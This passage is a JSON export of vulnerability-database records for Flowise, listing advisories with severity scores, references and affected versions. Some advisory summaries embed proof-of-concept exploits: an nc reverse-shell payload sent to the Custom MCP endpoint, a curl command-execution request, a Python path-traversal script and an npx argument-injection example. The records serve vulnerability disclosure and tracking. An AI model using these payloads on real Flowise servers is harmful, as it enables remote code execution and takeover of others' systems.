                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:18:28Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41272",
                "GHSA-2x8m-83vc-6wv4"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e65e-s5sd-kuhp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81149?format=api",
            "vulnerability_id": "VCID-ejdc-j73x-jydk",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41269",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00146",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34734",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41269"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41269",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41269"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rh7v-6w34-w2rr",
                    "reference_id": "GHSA-rh7v-6w34-w2rr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rh7v-6w34-w2rr"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr",
                    "reference_id": "GHSA-rh7v-6w34-w2rr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:21:08Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41269",
                "GHSA-rh7v-6w34-w2rr"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ejdc-j73x-jydk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360546?format=api",
            "vulnerability_id": "VCID-fje6-knjc-nfgf",
            "summary": "Flowise has unsandboxed remote code execution via Custom MCP\n### Summary\nThe Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the `FLOWISE_USERNAME` and `FLOWISE_PASSWORD` environment variables.\n\nThis combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.\n\n### PoC\n1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):\n   https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker\n\n2. Create a new file named `payload.json` somewhere in your machine, with the following data:\n```\n{\"inputs\":{\"mcpServerConfig\":{\"command\": \"touch\",\"args\": [\"/tmp/yofitofi\"]}},\"loadMethod\":\"listActions\"}\n```\n\n3. Send the following `curl` request using the `payload.json` file created above with the following command:\n```\ncurl -XPOST -H \"x-request-from: internal\" -H \"Content-Type: application/json\" --data @payload.json \"http://localhost:3000/api/v1/node-load-method/customMCP\"\n```\n\n4. 
Observe that a new file named `yofitofi` is created under the `/tmp` folder.\n\nSimilarly, we can use the same technique to gain a reverse shell using the built-in `nc` utility with the following JSON payload:\n```\n{\"inputs\":{\"mcpServerConfig\":{\"command\": \"nc\",\"args\": [\n\"<LISTENER_IP_ADDRESS>\",\"<LISTENER_PORT>\",\"-e\",\"/bin/sh\"\n]}},\n\"loadMethod\":\"listActions\"}\n```\n\n![Pasted image 20250420132335](https://github.com/user-attachments/assets/b41093b9-a0d7-415e-bf9b-b8cbce7183d6)\n\n### Impact\nRemote code execution\n\n### Mitigation\n- Consider adding additional access controls surrounding sensitive functionality such as Custom MCP, e.g. only users with \"Admin\" roles will be able to configure new Custom MCPs within the platform.\n- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.\n- Consider running Custom MCPs within a sandboxed environment\n\n### Credit\nThe vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5201",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/5201"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6933-jpx5-q87q",
                    "reference_id": "GHSA-6933-jpx5-q87q",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-6933-jpx5-q87q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "GHSA-6933-jpx5-q87q"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fje6-knjc-nfgf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/84126?format=api",
            "vulnerability_id": "VCID-fu6t-9dk4-jbh9",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization of the “Custom MCP” configuration in http://localhost:3000/canvas, where any user can add a new MCP. When adding a new MCP using stdio, the user can add any command, even though the code has input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess and a list of predefined specific safe commands: these commands, for example \"npx\", can be combined with code execution arguments (\"-c touch /tmp/pwn\") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40933",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00074",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22424",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40933"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40933",
                    "reference_id": "CVE-2026-40933",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40933"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c9gw-hvqq-f33r",
                    "reference_id": "GHSA-c9gw-hvqq-f33r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c9gw-hvqq-f33r"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r",
                    "reference_id": "GHSA-c9gw-hvqq-f33r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r"
                },
                {
                    "reference_url": "https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem",
                    "reference_id": "mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"
                        }
                    ],
                    "url": "https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem"
                },
                {
                    "reference_url": "https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp",
                    "reference_id": "the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"
                        }
                    ],
                    "url": "https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-40933",
                "GHSA-c9gw-hvqq-f33r"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fu6t-9dk4-jbh9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=api",
            "vulnerability_id": "VCID-g7y6-euhd-jqhh",
            "summary": "Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary file.\n\n### Details\n\nCommit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however,  `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n    // ...\n    } else {\n        const dir = path.join(getStoragePath(), chatflowid)  // path traversal here\n        if (!fs.existsSync(dir)) {\n            fs.mkdirSync(dir, { recursive: true })\n        }\n\n        const splitDataURI = fileBase64.split(',')\n        const filename = splitDataURI.pop()?.split(':')[1] ?? 
''\n        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n        const sanitizedFilename = _sanitizeFilename(filename)\n\n        const filePath = path.join(dir, sanitizedFilename)\n        fs.writeFileSync(filePath, bf)\n        fileNames.push(sanitizedFilename)\n        return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n    }\n}\n```\n\n**Case 2**\n\nWhen downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n  \"category\" : \"Document Loaders\",\n  \"inputs\" : {\n    \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n  }\n}\nflownode = {\n  \"id\" : \"a\",\n  \"data\" : nodedata\n}\nflowdata = {\n  \"nodes\" : [flownode],\n  \"edges\" : [],\n  \"viewport\" : {\n    \"x\" : 1,\n    \"y\" : 1,\n    \"zoom\" : 1\n  }\n}\ndata = {\n  \"id\" : \"../../../../../tmp\",\n  \"name\" : \"name\",\n  \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. Data loss",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q67q-549q-p849",
                    "reference_id": "GHSA-q67q-549q-p849",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-q67q-549q-p849"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "GHSA-q67q-549q-p849"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359950?format=api",
            "vulnerability_id": "VCID-gvpx-4wkw-43cz",
            "summary": "Flowise Execute Flow function has an SSRF vulnerability\n### Summary\n\nThe attacker provides an intranet address through the base url field configured in the Execute Flow node \n→ Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called)\n→ Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services \n\n### Details\n\n<img width=\"1280\" height=\"860\" alt=\"9a52a74e6fe2fd78e4962d1d68057fc2\" src=\"https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23\" />\n\nThen initiate the call: \n\n```\nPOST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\nServer received a request:\n\n<img width=\"1432\" height=\"172\" alt=\"f45c757fec408e13739db068252ff21b\" src=\"https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f\" />\n\nAnd there is an echo: \n\n<img width=\"1280\" height=\"666\" alt=\"fa0caf0deb306cfeeea8fdf8941a287e\" src=\"https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f\" />\n\nFix:\nCall secureFetch for verification\n\n\n\n### Impact\n\nThis is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: \n- Explore Internal Web Applications\n- Access sensitive management interfaces\n- Leak internal configuration, credentials, or confidential information\n\nThis vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9hrv-gvrv-6gf2",
                    "reference_id": "GHSA-9hrv-gvrv-6gf2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9hrv-gvrv-6gf2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-9hrv-gvrv-6gf2"
